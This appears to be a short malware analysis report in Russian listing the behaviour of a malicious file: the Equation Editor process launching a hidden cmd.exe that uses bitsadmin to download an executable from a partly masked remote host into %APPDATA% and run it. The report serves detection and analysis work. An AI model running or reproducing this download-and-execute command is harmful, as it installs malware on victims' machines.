Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Pv /priority foreground http://co####achina.com/dada_253782.exe %APPDATA%\pYw.exe && start %APPDATA%\pYw.exe
- 'co####achina.com':80
- DNS ASK co####achina.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Pv /priority foreground http://co####achina.com/dada_253782.exe %APPDATA%\pYw.exe && start %APPDATA%\pYw.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer Pv /priority foreground http://co####achina.com/dada_253782.exe %APPDATA%\pYw.exe